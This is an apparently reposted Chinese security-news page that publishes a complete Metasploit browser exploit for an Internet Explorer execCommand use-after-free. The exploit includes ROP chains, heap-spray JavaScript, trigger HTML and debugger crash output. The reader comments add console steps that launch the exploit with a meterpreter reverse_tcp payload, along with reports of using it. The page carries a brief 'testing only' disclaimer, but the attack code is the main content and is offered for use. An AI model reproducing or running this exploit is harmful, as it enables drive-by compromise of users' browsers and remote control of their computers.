CVE漏洞中文网

0DayBank一个专门收集整理全球互联网漏洞的公开发布网站
  1. 首页
  2. 百科
  3. 正文

ie漏洞

2017年5月21日 1657点热度 0人点赞 0条评论
  • 首页
  • 分类阅读
  • 文库
  • 专栏
  • 公开课
  • 商城
  • 漏洞盒子
注册 | 登录
投稿

[0day]最新IE远程代码执行漏洞Exploit

dandan2012-09-19共172301人围观 ,发现 28 个不明物体WEB安全

小编:最近几周0day不断,Java漏洞(CVE-2012-4681)热度还未褪去,现在IE 0day又来了。

微软已于今日发布确认公告:

Sep 17th, 2012 - Microsoft releases advisory 2757760: http://technet.microsoft.com/en-us/security/advisory/2757760

参考资料
IE execCommand fuction Use after free Vulnerability 0day

Screen_shot_2012_09_16_at_4_40_09_PM

Screen+shot+2012-09-16+at+5.32.08+PM

Screen+shot+2012-09-17+at+7.59.19+AM

Exploit(仅用于漏洞验证测试,禁止非法使用)

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GoodRanking

	include Msf::Exploit::Remote::HttpServer::HTML
	include Msf::Exploit::Remote::BrowserAutopwn
	autopwn_info({
		 :ua_name    => HttpClients::IE,
		 :ua_minver  => "7.0",
		 :ua_maxver  => "9.0",
		 :javascript => true,
		 :rank       => GoodRanking
	 })

	def initialize(info={})
		super(update_info(info,
			'Name'           => "Microsoft Internet Explorer execCommand Use-After-Free Vulnerability ",
			'Description'    => %q{
				This module exploits a vulnerability found in Microsoft Internet Explorer (MSIE). When
				rendering an HTML page, the CMshtmlEd object gets deleted in an unexpected manner,
				but the same memory is reused again later in the CMshtmlEd::Exec() function, leading
				to a use-after-free condition.  Please note that this vulnerability has
				been exploited in the wild since Sep 14 2012, and there is currently no official
				patch for it.
			},
			'License'        => MSF_LICENSE,
			'Author'         =>
				[
					'unknown',     # Some secret ninja
					'eromang',     # First public discovery
					'binjo',
					'sinn3r',      # Metasploit
					'juan vazquez' # Metasploit
				],
			'References'     =>
				[
					[ 'OSVDB', '85532' ],
					[ 'URL', 'http://eromang.zataz.com/2012/09/16/zero-day-season-is-really-not-over-yet/' ],
					[ 'URL', 'http://blog.vulnhunt.com/index.php/2012/09/17/ie-execcommand-fuction-use-after-free-vulnerability-0day/'],
					[ 'URL', 'http://metasploit.com' ]
				],
			'Payload'        =>
				{
					'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
				},
			'DefaultOptions'  =>
				{
					'ExitFunction'         => "none",
					'InitialAutoRunScript' => 'migrate -f',
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Automatic', {} ],
					[ 'IE 7 on Windows XP SP3', { 'Rop' => nil,     'Offset' => '0x5fa', 'Random' => false } ],
					[ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt, 'Offset' => '0x5f4', 'Random' => false } ],
					[ 'IE 7 on Windows Vista',  { 'Rop' => nil,     'Offset' => '0x5fa', 'Random' => false } ],
					[ 'IE 8 on Windows Vista',  { 'Rop' => :jre,    'Offset' => '0x5f4', 'Random' => false } ],
					[ 'IE 8 on Windows 7',      { 'Rop' => :jre,    'Offset' => '0x5f4', 'Random' => false } ],
					[ 'IE 9 on Windows 7',      { 'Rop' => :jre,    'Offset' => '0x5fc', 'Random' => true } ]
				],
			'Privileged'     => false,
			'DisclosureDate' => "Sep 14 2012",  # When it was spotted in the wild by eromang
			'DefaultTarget'  => 0))
	end

	def get_target(agent)
		#If the user is already specified by the user, we'll just use that
		return target if target.name != 'Automatic'

		if agent =~ /NT 5\.1/ and agent =~ /MSIE 7/
			return targets[1]  #IE 7 on Windows XP SP3
		elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8/
			return targets[2]  #IE 8 on Windows XP SP3
		elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 7/
			return targets[3]  #IE 7 on Windows Vista
		elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 8/
			return targets[4]  #IE 8 on Windows Vista
		elsif agent =~ /NT 6\.1/ and agent =~ /MSIE 8/
			return targets[5]  #IE 8 on Windows 7
		elsif agent =~ /NT 6\.1/ and agent =~ /MSIE 9/
			return targets[6]  #IE 9 on Windows 7
		else
			return nil
		end
	end

	def junk(n=4)
		return rand_text_alpha(n).unpack("V")[0].to_i
	end

	def nop
		return make_nops(4).unpack("V")[0].to_i
	end

	def get_payload(t, cli)
		code = payload.encoded

		# No rop. Just return the payload.
		return code if t['Rop'].nil?

		# Both ROP chains generated by mona.py - See corelan.be
		case t['Rop']
		when :msvcrt
			print_status("Using msvcrt ROP")
			exec_size = code.length
			stack_pivot = [
				0x77c4e393, # RETN
				0x77c4e392, # POP EAX # RETN
				0x77c15ed5, # XCHG EAX, ESP # RETN
			].pack("V*")
			rop =
			[
				0x77C21891,  # POP ESI # RETN
				0x0c0c0c04,  # ESI
				0x77c4e392,  # POP EAX # RETN
				0x77c11120,  # <- *&VirtualProtect()
				0x77c2e493,  # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN
				junk,
				0x77c2dd6c,  # XCHG EAX,ESI # ADD [EAX], AL # RETN
				0x77c4ec00,  # POP EBP # RETN
				0x77c35459,  # ptr to 'push esp #  ret'
				0x77c47705,  # POP EBX # RETN
				exec_size,   # EBX
				0x77c3ea01,  # POP ECX # RETN
				0x77c5d000,  # W pointer (lpOldProtect) (-> ecx)
				0x77c46100,  # POP EDI # RETN 
				0x77c46101,  # ROP NOP (-> edi)
				0x77c4d680,  # POP EDX # RETN
				0x00000040,  # newProtect (0x40) (-> edx)
				0x77c4e392,  # POP EAX # RETN
				nop,         # NOPS (-> eax)
				0x77c12df9,  # PUSHAD # RETN
			].pack("V*")

		when :jre
			print_status("Using JRE ROP")
			exec_size = 0xffffffff - code.length + 1
			if t['Random']
				stack_pivot = [
					0x0c0c0c0c, # 0c0c0c08
					0x7c347f98, # RETN
					0x7c347f97, # POP EDX # RETN
					0x7c348b05  # XCHG EAX, ESP # RET
				].pack("V*")
			else
				stack_pivot = [
					0x7c347f98, # RETN
					0x7c347f97, # POP EDX # RETN
					0x7c348b05  # XCHG EAX, ESP # RET
				].pack("V*")
			end
			rop =
			[
				0x7c37653d,  # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN
				exec_size,   # Value to negate, will become 0x00000201 (dwSize)
				0x7c347f98,  # RETN (ROP NOP)
				0x7c3415a2,  # JMP [EAX]
				0xffffffff,
				0x7c376402,  # skip 4 bytes
				0x7c351e05,  # NEG EAX # RETN
				0x7c345255,  # INC EBX # FPATAN # RETN
				0x7c352174,  # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN
				0x7c344f87,  # POP EDX # RETN
				0xffffffc0,  # Value to negate, will become 0x00000040
				0x7c351eb1,  # NEG EDX # RETN
				0x7c34d201,  # POP ECX # RETN
				0x7c38b001,  # &Writable location
				0x7c347f97,  # POP EAX # RETN
				0x7c37a151,  # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll]
				0x7c378c81,  # PUSHAD # ADD AL,0EF # RETN
				0x7c345c30,  # ptr to 'push esp #  ret '
			].pack("V*")
		end

		code = stack_pivot + rop + code
		return code
	end

	# Spray published by corelanc0d3r
	# Exploit writing tutorial part 11 : Heap Spraying Demystified
	# See https://www.corelan.be/index.php/2011/12/31/exploit-writing-tutorial-part-11-heap-spraying-demystified/
	def get_random_spray(t, js_code, js_nops)

		spray = <<-JS

		function randomblock(blocksize)
		{
			var theblock = "";
			for (var i = 0; i < blocksize; i++)
			{
				theblock += Math.floor(Math.random()*90)+10;
			}
			return theblock;
		}

		function tounescape(block)
		{
			var blocklen = block.length;
			var unescapestr = "";
			for (var i = 0; i < blocklen-1; i=i+4)
			{
				unescapestr += "%u" + block.substring(i,i+4);
			}
			return unescapestr;
		}

		var heap_obj = new heapLib.ie(0x10000);

		var code = unescape("#{js_code}");
		var nops = unescape("#{js_nops}");

		while (nops.length < 0x80000) nops += nops;

		var offset_length = #{t['Offset']};

		for (var i=0; i < 0x1000; i++) {
			var padding = unescape(tounescape(randomblock(0x1000)));
			while (padding.length < 0x1000) padding+= padding;
			var junk_offset = padding.substring(0, offset_length);
			var single_sprayblock = junk_offset + code + nops.substring(0, 0x800 - code.length - junk_offset.length);
			while (single_sprayblock.length < 0x20000) single_sprayblock += single_sprayblock;
			sprayblock = single_sprayblock.substring(0, (0x40000-6)/2);
			heap_obj.alloc(sprayblock);
		}

		JS

		return spray
	end

	def get_spray(t, js_code, js_nops)
		js = <<-JS
		var heap_obj = new heapLib.ie(0x20000);
		var code = unescape("#{js_code}");
		var nops = unescape("#{js_nops}");

		while (nops.length < 0x80000) nops += nops;
		var offset = nops.substring(0, #{t['Offset']});
		var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);

		while (shellcode.length < 0x40000) shellcode += shellcode;
		var block = shellcode.substring(0, (0x80000-6)/2);

		heap_obj.gc();

		for (var i=1; i < 0x300; i++) {
			heap_obj.alloc(block);
		}

		var overflow = nops.substring(0, 10);
		JS
	end


	def load_html1(cli, my_target)
		p = get_payload(my_target, cli)

		js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(my_target.arch))
		js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(my_target.arch))
		js_r_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(my_target.arch))

		if my_target['Random']
			js = get_random_spray(my_target, js_code, js_r_nops)
		else
			js = get_spray(my_target, js_code, js_nops)
		end

		js = heaplib(js, {:noobfu => true})

		html = <<-EOS
		<html>
			<body>
				<script>
					var arrr = new Array();
					arrr[0] = window.document.createElement("img");
					arrr[0]["src"] = "#{Rex::Text.rand_text_alpha(1)}";
				</script>

				<iframe src="#{this_resource}/#{@html2_name}"></iframe>
				<script>
					#{js}
		        </script>
			</body>
		</html>
		EOS

		return html
	end

	def load_html2
		html = %Q|
		<HTML>
			<script>
				function funcB() {
					document.execCommand("selectAll");
				};

				function funcA() {
					document.write("#{Rex::Text.rand_text_alpha(1)}");
					parent.arrr[0].src = "YMjf\\u0c08\\u0c0cKDogjsiIejengNEkoPDjfiJDIWUAzdfghjAAuUFGGBSIPPPUDFJKSOQJGH";
				}

			</script>
			<body onload='funcB();' onselect='funcA()'>
				<div contenteditable='true'>
					a
				</div>
			</body>
		</HTML>
		|

		return html
	end

	def this_resource
		r = get_resource
		return ( r == '/') ? '' : r
	end

	def on_request_uri(cli, request)
		print_status request.headers['User-Agent']
		agent = request.headers['User-Agent']
		my_target = get_target(agent)

		# Avoid the attack if the victim doesn't have the same setup we're targeting
		if my_target.nil?
			print_error("Browser not supported, sending a 404: #{agent.to_s}")
			send_not_found(cli)
			return
		end

		vprint_status("Requesting: #{request.uri}")

		if request.uri =~ /#{@html2_name}/
			print_status("Loading #{@html2_name}")
			html = load_html2
		elsif request.uri =~ /#{@html1_name}/
			print_status("Loading #{@html1_name}")
			html = load_html1(cli, my_target)
		elsif request.uri =~ /\/$/ or request.uri =~ /#{this_resource}$/
			print_status("Redirecting to #{@html1_name}")
			send_redirect(cli, "#{this_resource}/#{@html1_name}")
			return
		else
			send_not_found(cli)
			return
		end

		html = html.gsub(/^\t\t/, '')

		send_response(cli, html, {'Content-Type'=>'text/html'})

	end

	def exploit
		@html1_name = "#{Rex::Text.rand_text_alpha(5)}.html"
		@html2_name = "#{Rex::Text.rand_text_alpha(6)}.html"
		super
	end

end


=begin
0:008> r
eax=00000000 ebx=0000001f ecx=002376c8 edx=0000000d esi=00000000 edi=0c0c0c08
eip=637d464e esp=020bbe80 ebp=020bbe8c iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
mshtml!CMshtmlEd::Exec+0x134:
637d464e 8b07            mov     eax,dword ptr [edi]  ds:0023:0c0c0c08=????????

0:008> u
mshtml!CMshtmlEd::Exec+0x134:
637d464e 8b07            mov     eax,dword ptr [edi]
637d4650 57              push    edi
637d4651 ff5008          call    dword ptr [eax+8]

0:008> k
ChildEBP RetAddr  
020bbe8c 637d4387 mshtml!CMshtmlEd::Exec+0x134
020bbebc 637be2fc mshtml!CEditRouter::ExecEditCommand+0xd6
020bc278 638afda7 mshtml!CDoc::ExecHelper+0x3c91
020bc298 638ee2a9 mshtml!CDocument::Exec+0x24
020bc2c0 638b167b mshtml!CBase::execCommand+0x50
020bc2f8 638e7445 mshtml!CDocument::execCommand+0x93
020bc370 636430c9 mshtml!Method_VARIANTBOOLp_BSTR_oDoVARIANTBOOL_o0oVARIANT+0x149
020bc3e4 63643595 mshtml!CBase::ContextInvokeEx+0x5d1
020bc410 63643832 mshtml!CBase::InvokeEx+0x25
020bc460 635e1cdc mshtml!DispatchInvokeCollection+0x14b
020bc4a8 63642f30 mshtml!CDocument::InvokeEx+0xf1
020bc4d0 63642eec mshtml!CBase::VersionedInvokeEx+0x20
020bc520 633a6d37 mshtml!PlainInvokeEx+0xea
020bc560 633a6c75 jscript!IDispatchExInvokeEx2+0xf8
020bc59c 633a9cfe jscript!IDispatchExInvokeEx+0x6a
020bc65c 633a9f3c jscript!InvokeDispatchEx+0x98
020bc690 633a77ff jscript!VAR::InvokeByName+0x135
020bc6dc 633a85c7 jscript!VAR::InvokeDispName+0x7a
020bc708 633a9c0b jscript!VAR::InvokeByDispID+0xce
020bc8a4 633a5ab0 jscript!CScriptRuntime::Run+0x2989
=end

dandan
|
|
  • 上一篇:PkavProxyPro商业扫描器通用破解程序
  • 下一篇:Adobe Flash Player远程代码执行漏洞分析(CVE-2012-1535)

这些评论亮了

  • who回复
    我的更新了msf怎么没找到ie_execcommand_uaf这个,我的是BT5下的。。
    )6(亮了
发表评论

已有 28 条评论

  • 睡神 2012-09-18回复1楼

    这个要火啊!!!

    亮了(4)
  • 神经 2012-09-19回复2楼

    代码没后门什么的把

    亮了(0)
    • mirr0r 2012-09-20回复

      @神经 代码都在这不会自己审核下 = =,应该很好理解的,可以参照Metasploit的那本书

      亮了(0)
  • asion (1级)出来混,总有一天要还的 2012-09-19回复3楼

    这个又要犀利了..win7用户果断不少 啊

    亮了(0)
  • 10457793 (2级) 2012-09-19回复4楼

    msf更新完毕

    亮了(2)
  • 10457793 (2级) 2012-09-19回复5楼

    Windows xp sp3 +IE8 无防护 浏览器崩溃 没成功!有成功的吗

    亮了(0)
    • rzdpc (1级) 2012-09-19回复

      @10457793  在英文版下能够成功

      亮了(1)
      • 10457793 (2级) 2012-09-19回复

        @rzdpc 不适合国情了 :mrgreen:

        亮了(0)
      • Metaswstar (1级)个一鸟菜 2012-09-19回复

        @rzdpc 有exploit步骤share么 英文版的win7失败,郁闷中

        亮了(0)
  • 原创 2012-09-19回复6楼

    哪位好心人把网马提取出来

    亮了(0)
  • linxiaoxiao (1级) 2012-09-19回复7楼

    @10457793 我更新之后,怎么找不到IE0day呐?求解

    亮了(0)
    • 雷锋 2012-09-19回复

      @linxiaoxiao  use exploit/windows/browser/ie_execcommand_uaf

      亮了(5)
      • who 2012-09-20回复

        @雷锋 我的更新了msf怎么没找到ie_execcommand_uaf这个,我的是BT5下的。。

        亮了(0)
  • hellopython 2012-09-19回复8楼

    win7下的IE9没有成功,也是浏览器崩溃。电脑反应变慢。

    亮了(1)
  • saline 2012-09-19回复9楼

    msf > use exploit/windows/browser/ie_execcommand_uaf
    msf exploit(ie_execcommand_uaf) > set payload windows/meterpreter/reverse_tcp
    payload => windows/meterpreter/reverse_tcp
    msf exploit(ie_execcommand_uaf) > set lhost 192.168.1.110
    lhost => 192.168.1.110
    msf exploit(ie_execcommand_uaf) > set srvhost 192.168.1.110
    srvhost => 192.168.1.110
    msf exploit(ie_execcommand_uaf) > set uripath 河蟹
    uripath => index.html
    msf exploit(ie_execcommand_uaf) > exploit
    [*] Exploit running as background job.

    [*] Started reverse handler on 192.168.1.110:4444
    [*] Using URL: http://192.168.1.110:8080/河蟹
    [*] Server started.

    有没有发现win7+ie8的会把浏览器测试死的

    亮了(3)
  • abc 2012-09-19回复10楼

    CHTWin7+ie8 也是浏览器崩溃

    亮了(0)
    • phper 2012-09-19回复

      @abc 浏览器崩溃的同时msf那边meterpreter能建立不?

      亮了(0)
      • Metaswstar (1级)个一鸟菜 2012-09-19回复

        @phper 不能,仅仅显示读取某些不存在的html,比如ehFvbg.html

        亮了(2)
      • abc 2012-09-19回复

        @phper METASWSTAR说的一漾 无法顺利运行

        亮了(0)
      • Metaswstar (1级)个一鸟菜 2012-09-20回复

        @phper Win7自带DEP和ASLR,会让测试失败,但关闭后浏览器仍然崩溃,无法成功。
        XP英文版上关闭DEP,测试IE7是可以成功!

        亮了(3)
  • a 2012-09-19回复11楼

    尼玛啊 鼠标左键不好使 滑了老半天 360还提示更新补丁呢 :eek:

    亮了(2)
  • 笔墨 2012-09-19回复12楼

    http://tieba.baidu.com/p/1870924368

    测试全程

    亮了(2)
  • 有人遛鱼 2012-09-19回复13楼

    老外做出来的,主要针对英文版本 这个不是metasploit上公布的那个么,实测有很多问题 转发微博

    亮了(0)
  • who 2012-09-20回复14楼

    我的更新了msf怎么没找到ie_execcommand_uaf这个,我的是BT5下的。。

    亮了(6)
  • fuck you 2012-09-20回复15楼

    不能用

    亮了(1)
  • 1 2012-09-20回复16楼

    WTF..

    亮了(0)
  • linxiaoxiao (1级) 2012-09-21回复17楼

    @雷锋 没有找到。我是BT5 R2的

    亮了(0)
  • 求成功的虚拟机~!! 2017-04-24回复18楼

    求求各位大大大!!!!!!!最近想用这个做培训,但是一直搭不成功~!!!!!!!!!!一次都没有成功过~!!!!求个虚拟机。。。。能用就行。。。。有网盘地址吗????????????????

    亮了(0)

必须您当前尚未登录。登陆?注册

必须(保密)

表情插图

取消

dandan

这是一个神奇的马甲

661 篇文章0 条评论

相关阅读

  • 代码,变形!网络安全初创企业Shape以其人之道对付网站攻击
  • 苏宁易购招聘安全工程师
  • [0day]IE execCommand fuction Use after free Vulnerability 0day
  • 10大预测:2017年网络安全的趋势可能是这样的…
  • 路透社报告称美国政府是“0day”漏洞最大的买家

特别推荐

关注我们 分享每日精选文章

不容错过

  • 【快讯】乐天中国官网疑似遭遇黑客攻击,至今无法访问kuma2017-03-02
  • 沙虫(CVE-2014-4114)新变种惊现针对台湾的APT攻击事件中Rabbit_Run2014-10-24
  • 钓鱼邮件初探:黑客是如何进行邮件伪造的?dontshoot2016-01-07
  • 黑色藤蔓(Black Vine):专攻航空航天和医疗保险的网络间谍组织森碟2015-07-30

FREEBUF

  • 免责声明
  • 关于我们
  • 加入我们

广告及服务

  • 寻求报道
  • 广告合作
  • 联系我们
  • 友情链接

关注我们

  • 官方微信
  • 新浪微博
  • 腾讯微博
  • Twitter

赞助商

Copyright © 2013 WWW.FREEBUF.COM All Rights Reserved 沪ICP备13033796号

css.php

正在加载中...

0day

标签: 暂无
最后更新:2017年5月21日

小助手

这个人很懒,什么都没留下

点赞
< 上一篇
下一篇 >

文章评论

您需要 登录 之后才可以评论

COPYRIGHT © 2024 www.pdr.cn CVE漏洞中文网. ALL RIGHTS RESERVED.

鲁ICP备2022031030号

联系邮箱:wpbgssyubnmsxxxkkk@proton.me